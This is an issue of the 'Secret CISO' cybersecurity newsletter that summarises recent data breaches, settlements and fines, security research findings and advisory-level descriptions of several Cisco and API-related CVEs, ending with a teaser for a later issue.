Secret CISO 11/16: Rampant Bank Fraud, National Public Data Breach, Twitch Fined in Turkey, T-Mobile Chinese Breach, Cloud Security Myths Debunked

Secret CISO 11/16: Rampant Bank Fraud, National Public Data Breach, Twitch Fined in Turkey, T-Mobile Chinese Breach, Cloud Security Myths Debunked

Welcome to today's issue of Secret CISO, your daily dose of cybersecurity news.

Today, we're diving into the rampant bank fraud and data breaches that are putting your personal information at risk. We'll explore how massive data leaks, such as the National Public Data breach, are giving scammers access to billions of Social Security numbers and other consumer data.

We'll also look at how companies like National Amusements theater chain and Amazon's Twitch are facing hefty fines for failing to protect their employees and users from data breaches. In the healthcare sector, we'll discuss the myths surrounding cloud security and how health systems can better protect themselves. In telecom news, T-Mobile has reportedly been hacked in a massive Chinese breach of telecom networks. Meanwhile, Ardagh Glass and Lehigh Valley Health Network are paying out millions in settlements following data breaches.

In the education sector, Otsego Public Schools is alerting families to a data breach that may have resulted in personal information being stolen. And in the entertainment industry, National Amusements failed to protect employee data, affecting over 82,000 individuals nationwide. We'll also discuss what's being done to protect you when your info is compromised in a data breach, and how companies like AWS are enhancing centralized security controls. Stay tuned for more updates and remember, knowledge is the first line of defense. Stay safe out there!

Data Breaches

  1. "National Amusements theater chain to pay $250,000 for failing to protect employees": The company failed to inform affected employees about a data breach for over a year. The breach affected a total of 82,128 individuals nationwide due to lax security practices. Source: Newsday and Brooklyn Eagle
  2. "Turkey fines Amazon's Twitch 2 million lira for data breach": Turkey's Personal Data Protection Board (KVKK) has fined Amazon's gaming platform Twitch 2 million lira ($58000) over a data breach. The investigation revealed that Twitch had failed to take adequate security measures beforehand. Source: CNA and US News Money
  3. "T-Mobile hacked in massive Chinese breach of telecom networks": At this time, T-Mobile systems and data have not been impacted in any significant way, and there is no evidence of impacts to customer information. Source: Reuters
  4. "Ardagh Glass data breach settlement": Ardagh Glass has reached a $2.75 million settlement as part of a class action lawsuit claiming that the company failed to prevent a 2021 data breach. Thousands of Americans are set to receive up to $11000 as part of the settlement. Source: AS
  5. "Patients at center of data breach case win $65M settlement against Lehigh Valley Health Network": A Pennsylvania judge has cleared the way for a $65 million settlement with Lehigh Valley Health Network in a data breach case. The class-action lawsuit represented cancer patients. Source: DataBreaches.net and WHYY

Security Research

  1. DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials: Security researchers Callum Roxan, Charlie Gardner, and Paul Rascagneres have identified a new malware, DEEPDATA, that exploits an unpatched flaw in Fortinet to steal VPN credentials. This highlights the importance of keeping systems updated to prevent such security breaches. Source: The Hacker News
  2. Enhancing Retail Security through Community Collaboration and Technology: This research emphasizes the importance of leveraging technology and fostering strong partnerships to enhance security measures in retail environments, such as convenience stores and gas stations. Source: CCentral
  3. Cloud Platform Bugs Threaten Smart Home Security: Security researchers at Claroty's Team82 have uncovered 10 vulnerabilities in the widely used OvrC cloud platform. These flaws could potentially threaten the security of smart homes, emphasizing the need for robust security measures in IoT devices. Source: BankInfoSecurity
  4. Common way to test for leaks in large language models may be flawed: Computer security expert David Evans and his colleagues have reported that the common method of testing for leaks in large language models may be flawed. This could have significant implications for the security of AI systems. Source: Tech Xplore
  5. Misconfigurations can cause many Microsoft Power Pages sites to expose sensitive data: Security research by Costello has revealed that misconfigurations can cause many Microsoft Power Pages sites to expose sensitive data. This highlights the importance of proper configuration and security practices to protect sensitive information. Source: CSO Online

Top CVEs

  1. CVE-2022-20652: A vulnerability in Cisco Tetration's web-based management interface and API subsystem could allow an authenticated, remote attacker to inject arbitrary commands with root-level privileges. The issue arises from insufficient input validation. Cisco has released software updates to address this vulnerability. Source: CVE-2022-20652
  2. CVE-2023-20154: A vulnerability in Cisco Modeling Labs' external authentication mechanism could allow an unauthenticated, remote attacker to access the web interface with administrative privileges. The issue is due to improper handling of certain messages returned by the associated external authentication server. Cisco has released software updates to address this vulnerability. Source: CVE-2023-20154
  3. CVE-2023-20060: A vulnerability in Cisco Prime Collaboration Deployment's web-based management interface could allow an unauthenticated, remote attacker to conduct a cross-site scripting attack. The issue arises from the interface not properly validating user-supplied input. Cisco plans to release software updates to address this vulnerability. Source: CVE-2023-20060
  4. CVE-2022-20853: A vulnerability in the REST API of Cisco Expressway Series and Cisco TelePresence VCS could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack. The issue is due to insufficient CSRF protections for the web-based management interface of an affected system. Cisco has released software updates to address this vulnerability. Source: CVE-2022-20853
  5. CVE-2023-20125: A vulnerability in the local interface of Cisco BroadWorks Network Server could allow an unauthenticated, remote attacker to exhaust system resources, causing a denial of service (DoS) condition. The issue arises from the lack of rate limiting for certain incoming TCP connections. Cisco has released software updates to address this vulnerability. Source: CVE-2023-20125

API Security

  1. CVE-2024-11092: The SVGPlus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads due to insufficient input sanitization and output escaping. This allows authenticated attackers to inject arbitrary web scripts in pages. Source: Vulners
  2. CVE-2022-39275: A proof of concept for a vulnerability in Saleor's API has been identified. The exploit involves improper input validation and requires application security experience to execute. Source: Vulners
  3. CVE-2024-38370: GLPI, a free asset and IT management software package, has a vulnerability that allows documents to be downloaded from the API without appropriate rights. Users are advised to upgrade to the latest version. Source: Vulners
  4. CVE-2024-11217: A vulnerability was found in the OAuth-server. OAuth-server logs the OAuth2 client secret when the logLevel is Debug higher for OIDC/GitHub/GitLab/Google IDPs login. Source: Vulners
  5. CVE-2024-52523: Nextcloud Server has a vulnerability where the API returns user or administrator defined external storage with fixed credentials in plain text if an attacker already has access to an active session of a user. It is recommended to upgrade to the latest version. Source: Vulners

Sponsored by Wallarm API Security Solution

Final Words

As we wrap up today's edition of Secret CISO, it's clear that data breaches and security threats are rampant and ever-evolving. From bank fraud to data leaks, no sector is immune. It's crucial to stay informed and vigilant, and that's where we come in. We hope that our daily updates help you navigate the complex landscape of technical security.

Remember, your data could be anywhere, and it's up to you to protect it. Stay tuned for more updates and don't forget to share this newsletter with your friends and colleagues.

Together, we can create a safer digital world. Stay secure!

Read more

Secret CISO 12/21: Clinic, Rapido, Monument Health, Credit Union, Duke Energy Data Breaches; Microsoft, Cisco, McDonald's Security Flaws; Research on AI, Biochar, Microgrid Cyber Resilience

Secret CISO 12/21: Clinic, Rapido, Monument Health, Credit Union, Duke Energy Data Breaches; Microsoft, Cisco, McDonald's Security Flaws; Research on AI, Biochar, Microgrid Cyber Resilience

Good morning, Secret CISO readers! Today's newsletter is packed with the latest updates on data breaches and security research. We start with a critique of a clinic's response to a data breach that exposed patients' personal and financial data. In India, ride-hailing platform Rapido has

By Secret CISO